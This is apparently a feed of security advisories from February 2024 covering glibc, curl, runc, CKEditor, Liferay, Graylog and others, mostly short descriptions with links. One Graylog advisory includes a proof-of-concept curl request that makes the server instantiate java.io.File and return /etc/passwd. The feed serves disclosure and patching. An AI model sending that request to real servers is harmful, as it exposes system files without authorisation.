02.02.2024 20:10:31	maven	[MAVEN:GHSA-9GH8-877R-G477] Beetl Server-Side Template Injection vulnerability (moderate)	Before Beetl v3.15.12, the rendering template has a server-side template injection (SSTI) vulnerability. When the incoming template is controllable, it will be filtered by the DefaultNativeSecurityManager blacklist. Because blacklist filtering is not strict, the blacklist can be bypassed, leading to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9GH8-877R-G477
02.02.2024 02:00:00	gentoo	[GLSA-202402-01] glibc: Multiple Vulnerabilities (high)	Multiple vulnerabilities in glibc could result in Local Privilege Escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-01
02.02.2024 02:00:00	oraclelinux	[ELSA-2024-0627] gnutls security update (moderate)	[3.6.16-8.1]- auth/rsa-psk: minimize branching after decryption (RHEL-21550)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0627
02.02.2024 02:00:00	oraclelinux	[ELSA-2024-0647] rpm security update (moderate)	[4.14.3-28.0.2]- Import additional patches to fix regressions with CVE-2021-35937, CVE-2021-35938 and CVE-2021-35939 patchset [Orabug: 36256318][4.14.3-28.0.1]- Fixed infinte loop for db_create with error check [Orabug: 36202920][4.14.3-28]- Backport file handling code from rpm-4.19 to fix CVE-2021-35937, CVE-2021-35938 and CVE-2021-35939[4.14.3-27]- Make brp-python-bytecompile script compatible with Python 3.10+Resolves: RHEL-6423	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0647
02.02.2024 02:00:00	freebsd	[FREEBSD:DC9E5237-C197-11EE-86BB-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 4 security fixes: [1511567] High CVE-2024-1060: Use after free in Canvas. Reported by Anonymous on 2023-12-14 [1514777] High CVE-2024-1059: Use after free in WebRTC. Reported by Cassidy Kim(@cassidy6564) on 2023-12-29 [1511085] High CVE-2024-1077: Use after free in Network. Reported by Microsoft Security Research Center on 2023-12-13	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:DC9E5237-C197-11EE-86BB-A8A1599412C6
03.02.2024 16:15:50	alpinelinux	[ALPINE:CVE-2024-0853] curl vulnerability	[From CVE-2024-0853] curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (OCSP stapling) test failed. A subsequent transfer tothe same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0853
04.02.2024 21:43:16	slackware	[SSA:2024-035-01] libxml2	New libxml2 packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libxml2-2.11.7-i586-1_slack15.0.txz: Upgraded. Fix the following security issue: xmlreader: Don't expand XIncludes when backtracking. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-25062 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libxml2-2.11.7-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libxml2-2.11.7-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.12.5-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.12.5-x86_64-1.txzMD5 signaturesSlackware 15.0 package:62a4fe8efaa414b80d9ed26e328512d9 libxml2-2.11.7-i586-1_slack15.0.txzSlackware x86_64 15.0 package:7f95acd6df018ee2407c2648e43265dc libxml2-2.11.7-x86_64-1_slack15.0.txzSlackware -current package:a8bb1185c13a7a2c0ce44808a65eb2d5 l/libxml2-2.12.5-i586-1.txzSlackware x86_64 -current package:5b38dd33b4986251180ac7ce051d31b6 l/libxml2-2.12.5-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libxml2-2.11.7-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-035-01
04.02.2024 02:00:00	debian	[DSA-5615-1] runc (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5615-1
04.02.2024 02:00:00	gentoo	[GLSA-202402-07] Xen: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been found in Xen, the worst of which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-07
04.02.2024 02:00:00	gentoo	[GLSA-202402-09] Wireshark: Multiple Vulnerabilities (low)	Multiple out-of-bounds read vulnerabilities have been discovered in Wireshark.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-09
04.02.2024 02:00:00	gentoo	[GLSA-202402-08] OpenSSL: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-08
04.02.2024 02:00:00	gentoo	[GLSA-202402-10] NBD Tools: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in NBD Tools, the worst of which could result in arbitary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-10
06.02.2024 00:34:11	maven	[MAVEN:GHSA-7QW4-9R68-2RMX] mingSoft MCMS File Upload vulnerability (high)	File Upload vulnerability in MCMS 5.3.5 allows attackers to upload arbitrary files via crafted POST request to /ms/file/upload.do.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7QW4-9R68-2RMX
06.02.2024 00:58:57	npm	[NPM:GHSA-9M6M-C64R-W4F4] Stimulsoft Dashboard.JS Cross Site Scripting vulnerability (moderate)	Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9M6M-C64R-W4F4
06.02.2024 00:33:49	npm	[NPM:GHSA-9CGF-PXWQ-2CPW] Stimulsoft Dashboard.JS Cross Site Scripting vulnerability (moderate)	Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9CGF-PXWQ-2CPW
05.02.2024 02:00:00	debian	[DSA-5616-1] ruby-sanitize	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5616-1
05.02.2024 02:00:00	oraclelinux	[ELSA-2024-0670] runc security update (important)	[4:1.1.12-1]- update to https://github.com/opencontainers/runc/releases/tag/v1.1.12- Related: RHEL-2112[4:1.1.11-1]- update to https://github.com/opencontainers/runc/releases/tag/v1.1.11- Related: RHEL-2112[4:1.1.10-3]- Rebuild for CVEs: CVE-2023-39321 CVE-2023-39322 CVE-2023-29409- Related: Jira:RHEL-2792- Related: Jira:RHEL-7454[4:1.1.10-2]- require container-selinux >= 2.224.0 for dmz feature- Related: Jira:RHEL-2112[4:1.1.10-1]- update to https://github.com/opencontainers/runc/releases/tag/v1.1.10- Related: RHEL-2112	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0670
05.02.2024 02:00:00	oraclelinux	[ELSA-2024-12135] gnutls security update (moderate)	[3.6.16-8.1_fips]- Allow RSA keygen with modulus sizes bigger than 3072 bits and validate the seed length as defined in FIPS 186-4 section B.3.2 [Orabug: 33200526]- Allow bigger known RSA modulus sizes when calling rsa_generate_fips186_4_keypair directly [Orabug: 33200526]- Change Epoch from 1 to 10[3.6.16-8.1]- auth/rsa-psk: minimize branching after decryption (RHEL-21550)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12135
05.02.2024 22:20:30	npm	[NPM:GHSA-MPWJ-FCR6-X34C] Yarn untrusted search path vulnerability (high)	An untrusted search path vulnerability was found in Yarn. When a victim runs certain Yarn commands in a directory with attacker-controlled content, malicious commands could be executed in unexpected ways.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MPWJ-FCR6-X34C
05.02.2024 22:55:24	rubysec	[RUBYSEC:NOKOGIRI-XC9X-JJ77-9P9J] Improper Handling of Unexpected Data Type in Nokogiri	### SummaryNokogiri v1.16.2 upgrades the version of its dependency libxml2 to v2.12.5.libxml2 v2.12.5 addresses the following vulnerability:CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970Please note that this advisory only applies to the CRuby implementation ofNokogiri < 1.16.2, and only if the packaged libraries are being used. Ifyou've overridden defaults at installation time to use system librariesinstead of packaged libraries, you should instead pay attention to yourdistro's libxml2 release announcements.### SeverityThe Nokogiri maintainers have evaluated this as Moderate.### MitigationUpgrade to Nokogiri >= 1.16.2.Users who are unable to upgrade Nokogiri may also choose a more complicatedmitigation: compile and link Nokogiri against external libraries libxml2 >=2.12.5 which will also address these same issues.JRuby users are not affected.### Workarounds	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:NOKOGIRI-XC9X-JJ77-9P9J
06.02.2024 20:24:33	maven	[MAVEN:GHSA-H2RQ-QHR7-53GM] Apache Sling Servlets Resolver executes malicious code via path traversal (high)	Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver.This issue affects all version of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system.If the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script. Users are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H2RQ-QHR7-53GM
06.02.2024 11:15:52	alpinelinux	[ALPINE:CVE-2024-0684] coreutils vulnerability	[From CVE-2024-0684] A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0684
06.02.2024 20:23:20	npm	[NPM:GHSA-GFQF-9W98-7JMX] Stimulsoft Dashboard.JS directory traversal vulnerability (critical)	Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.3 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GFQF-9W98-7JMX
06.02.2024 17:52:35	maven	[MAVEN:GHSA-9GP8-6CG8-7H34] Spring Security's spring-security.xsd file is world writable (moderate)	The spring-security.xsd file inside the spring-security-config jar is world writable which means that if it were extracted it could be written by anyone with access to the file system.While there are no known exploits, this is an example of “CWE-732: Incorrect Permission Assignment for Critical Resource” and could result in an exploit. Users should update to the latest version of Spring Security to mitigate any future exploits found around this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9GP8-6CG8-7H34
06.02.2024 02:00:00	cisa	[CISA-2024:0206] CISA Adds One Known Exploited Vulnerability to Catalog	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0206
06.02.2024 19:57:48	rustsec	[RUSTSEC-2024-0010] Improper comparison of different-length signatures	The `Webhook::verify` function incorrectly compared signatures ofdifferent lengths - the two signatures would only be compared up tothe length of the shorter signature. This allowed an attacker topass in `v1,` as the signature, which would always pass verification.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0010
06.02.2024 17:40:20	android	[ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)	In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947
06.02.2024 22:29:20	npm	[NPM:GHSA-7XM8-WJQ7-88R5] DeviceFarmer stf uses DES-ECB (critical)	DeviceFarmer stf v3.6.6 suffers from Use of a Broken or Risky Cryptographic Algorithm.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7XM8-WJQ7-88R5
07.02.2024 22:13:19	slackware	[SSA:2024-038-01] expat	New expat packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/expat-2.6.0-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Fix quadratic runtime issues with big tokens that can cause denial of service. Fix billion laughs attacks for users compiling without XML_DTD defined (which is not common). For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-52425 https://www.cve.org/CVERecord?id=CVE-2023-52426 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/expat-2.6.0-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/expat-2.6.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/expat-2.6.0-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/expat-2.6.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:5fc9ee070934b620f18f25589161af50 expat-2.6.0-i586-1_slack15.0.txzSlackware x86_64 15.0 package:4d154e83a4c7aa16e9ec3b13883d0541 expat-2.6.0-x86_64-1_slack15.0.txzSlackware -current package:0a52eddf970a67cde7db5c3e0b22936a l/expat-2.6.0-i586-1.txzSlackware x86_64 -current package:ff61e2750bcbb0ac9255f48be240dd8d l/expat-2.6.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg expat-2.6.0-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-038-01
07.02.2024 20:24:21	maven	[MAVEN:GHSA-3XF8-G8GR-G7RH] Graylog session fixation vulnerability through cookie injection (moderate)	### ImpactReauthenticating with an existing session cookie would re-use that session id, even if for different user credentials.In this case, the pre-existing session could be used to gain elevated access to an existing Graylog login session, provided the malicious user could successfully inject their session cookie into someone else's browser.The complexity of such an attack is high, because it requires presenting a spoofed login screen and injection of a session cookie into an existing browser, potentially through an XSS attack. No such attack has been discovered.### PatchesGraylog 5.1.11 and 5.2.4, and any versions of the 6.0 development branch contain patches to not re-use sessions under any circumstances, making this type of attack impossible.### WorkaroundsUsing short session expiration and explicit log outs of unused sessions can help limiting the attack vector. Unpatched this vulnerability exists, but is relatively hard to exploit.A proxy could be leveraged to clear the `authentication` cookie for the Graylog server URL for the `/api/system/sessions` endpoint, as that is the only one vulnerable.Analysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3XF8-G8GR-G7RH
07.02.2024 22:24:28	maven	[MAVEN:GHSA-P6GG-5HF4-4RGJ] Graylog vulnerable to instantiation of arbitrary classes triggered by API request (high)	### SummaryArbitrary classes can be loaded and instantiated using a HTTP PUT request to the `/api/system/cluster_config/` endpoint.### DetailsGraylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader. https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214### PoCA request of the following form will output the content of the `/etc/passwd` file:```curl -u admin:<admin-password> -X PUT http://localhost:9000/api/system/cluster_config/java.io.File \ -H "Content-Type: application/json" \ -H "X-Requested-By: poc" \ -d '"/etc/passwd"'```To perform the request, authorization is required. Only users posessing the `clusterconfigentry:create` and `clusterconfigentry:edit` permissions are allowed to do so. These permissions are usually only granted to `Admin` users.### ImpactIf a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. This will execute arbitrary code that is run during class instantiation.In the specific use case of `java.io.File`, the behaviour of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request.### CreditsAnalysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P6GG-5HF4-4RGJ
07.02.2024 20:21:06	npm	[NPM:GHSA-WH5W-82F3-WRXH] CKEditor cross-site scripting vulnerability in AJAX sample (moderate)	### Affected packagesThe vulnerability has been discovered in the AJAX sample available at the `samples/old/ajax.html` file location. All integrators that use that sample in the production code can be affected.### ImpactA potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the AJAX sample. It affects all users using the CKEditor 4 at version < 4.24.0-lts where `samples/old/ajax.html` is used in a production environment.### PatchesThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.### For more informationEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.### AcknowledgementsThe CKEditor 4 team would like to thank Rafael Pedrero and INCIBE ([original report](https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor)) for recognizing and reporting this vulnerability.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WH5W-82F3-WRXH
07.02.2024 22:24:13	npm	[NPM:GHSA-MW2C-VX6J-MG76] CKEditor4 Cross-site Scripting vulnerability in samples with enabled the preview feature (moderate)	### Affected packagesThe vulnerability has been discovered in the samples that use the [preview](https://ckeditor.com/cke4/addon/preview) feature:* `samples/old/*/.html`* `plugins/[plugin name]/samples/*/.html`All integrators that use these samples in the production code can be affected.### ImpactA potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the misconfigured [preview feature](https://ckeditor.com/cke4/addon/preview). It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment.### PatchesThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.### For more informationEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.### AcknowledgementsThe CKEditor 4 team would like to thank Marcin Wyczechowski & Michał Majchrowicz AFINE Team for recognizing and reporting this vulnerability.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MW2C-VX6J-MG76
07.02.2024 22:23:51	npm	[NPM:GHSA-FQ6H-4G8V-QQVM] CKEditor4 Cross-site Scripting vulnerability caused by incorrect CDATA detection (moderate)	### Affected packagesThe vulnerability has been discovered in the core HTML parsing module and may affect all editor instances that:* Enabled [full-page editing](https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html) mode,* or enabled [CDATA](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata) elements in [Advanced Content Filtering](https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html) configuration (defaults to `script` and `style` elements).### ImpactA potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. It affects all users using the CKEditor 4 at version < 4.24.0-lts.### PatchesThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.### For more informationEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.### AcknowledgementsThe CKEditor 4 team would like to thank [Michal Frýba](https://cz.linkedin.com/in/michal-fryba) from [ALEF NULA](https://www.alefnula.com/) for recognizing and reporting this vulnerability.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FQ6H-4G8V-QQVM
07.02.2024 18:00:00	cisco	[CISCO-SA-EXPRESSWAY-CSRF-KNNZDMJ3] Cisco Expressway Series Cross-Site Request Forgery Vulnerabilities (critical)	Multiple vulnerabilities in the Cisco Expressway Series could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks, which could allow the attacker to perform arbitrary actions on an affected device.Note: Cisco Expressway Series refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPRESSWAY-CSRF-KNNZDMJ3
07.02.2024 18:00:00	cisco	[CISCO-SA-CLAMAV-HDFFU6T] ClamAV OLE2 File Format Parsing Denial of Service Vulnerability (high)	A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources.For a description of this vulnerability, see the ClamAV blog ["https://blog.clamav.net/2023/11/clamav-130-122-105-released.html"].Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CLAMAV-HDFFU6T
07.02.2024 23:21:57	maven	[MAVEN:GHSA-9VGQ-W5PV-V77Q] Liferay Portal stored cross-site scripting (XSS) vulnerability (critical)	Stored cross-site scripting (XSS) vulnerability in the Portal Search module's Search Result app in Liferay Portal 7.2.0 through 7.4.3.11, and older unsupported versions, and Liferay DXP 7.4 before update 8, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML into the Search Result app's search result if highlighting is disabled by adding any searchable content (e.g., blog, message board message, web content article) to the application.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9VGQ-W5PV-V77Q
07.02.2024 21:32:24	maven	[MAVEN:GHSA-87M3-6QJ3-P3XH] Liferay Portal denial of service (memory consumption) (moderate)	The Document and Media widget In Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-87M3-6QJ3-P3XH
07.02.2024 21:23:36	maven	[MAVEN:GHSA-6726-2RX3-CGWH] Apache Ozone Improper Authentication vulnerability (moderate)	Improper Authentication vulnerability in Apache Ozone.The vulnerability allows an attacker to download metadata internal to the Storage Container Manager service without proper authentication.The attacker is not allowed to do any modification within the Ozone Storage Container Manager service using this vulnerability.The accessible metadata does not contain sensitive information that can be used to exploit the system later on, and the accessible data does not make it possible to gain access to actual user data within Ozone.This issue affects Apache Ozone: 1.2.0 and subsequent releases up until 1.3.0.Users are recommended to upgrade to version 1.4.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6726-2RX3-CGWH
07.02.2024 20:23:34	maven	[MAVEN:GHSA-C57V-4VG5-CM2X] Apache Pulsar SASL Authentication Provider observable timing discrepancy vulnerability (high)	Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification.Users are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file.Any component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker.2.11 Pulsar users should upgrade to at least 2.11.3.3.0 Pulsar users should upgrade to at least 3.0.2.3.1 Pulsar users should upgrade to at least 3.1.1.Any users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions.For additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C57V-4VG5-CM2X
07.02.2024 00:17:51	go	[GO-2024-2497] Privilege escalation in github.com/moby/buildkit	BuildKit provides APIs for running interactive containers based on built images.It was possible to use these APIs to ask BuildKit to run a container withelevated privileges. Normally, running such containers is only allowed ifspecial security.insecure entitlement is enabled both by buildkitdconfiguration and allowed by the user initializing the build request.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2497
07.02.2024 00:16:15	alpinelinux	[ALPINE:CVE-2024-24575] libgit2 vulnerability	[From CVE-2024-24575] libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24575
07.02.2024 00:16:15	alpinelinux	[ALPINE:CVE-2024-24577] libgit2 vulnerability	[From CVE-2024-24577] libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24577
07.02.2024 17:40:16	android	[ASB-A-230492947] Start foreground activity from background in ActivityTaskManagerService#startNextMatchingActivity (high)	In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	https://secdb.nttzen.cloud/security-advisory/android/ASB-A-230492947
08.02.2024 22:01:57	msrc	[MS:CVE-2024-1284] Chromium: CVE-2024-1284 Use after free in Mojo		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1284
08.02.2024 22:01:52	msrc	[MS:CVE-2024-1283] Chromium: CVE-2024-1283 Heap buffer overflow in Skia		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1283
08.02.2024 20:42:14	maven	[MAVEN:GHSA-C352-X843-GGPQ] XXL-JOB vulnerable to Server-Side Request Forgery (moderate)	xxl-job <= 2.4.0 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C352-X843-GGPQ
08.02.2024 20:31:20	maven	[MAVEN:GHSA-QWJ8-QGPR-8CRM] Liferay Portal vulnerable to user impersonation (moderate)	In Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions the `doAsUserId` URL parameter may get leaked when creating linked content using the WYSIWYG editor and while impersonating a user. This may allow remote authenticated users to impersonate a user after accessing the linked content.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QWJ8-QGPR-8CRM
08.02.2024 20:30:37	maven	[MAVEN:GHSA-MQF8-4CQM-P83X] Liferay Portal allows attackers to discover the existence of sites (moderate)	Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 18, and older unsupported versions returns with different responses depending on whether a site does not exist or if the user does not have permission to access the site, which allows remote attackers to discover the existence of sites by enumerating URLs. This vulnerability occurs if locale.prepend.friendly.url.style=2 and if a custom 404 page is used.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MQF8-4CQM-P83X
08.02.2024 20:26:21	maven	[MAVEN:GHSA-W275-M8CR-HF2V] Liferay Portal denial-of-service vulnerability (moderate)	The IFrame widget in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 6, 7.2 before fix pack 19, and older unsupported versions does not check the URL of the IFrame, which allows remote authenticated users to cause a denial-of-service (DoS) via a self referencing IFrame.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W275-M8CR-HF2V
08.02.2024 02:00:00	debian	[DSA-5618-1] webkit2gtk	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5618-1
08.02.2024 02:00:00	debian	[DSA-5617-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5617-1
08.02.2024 02:00:00	redhat	[RHSA-2024:0752] container-tools:rhel8 security update (important)	The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* runc: file descriptor leak (CVE-2024-21626)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0752
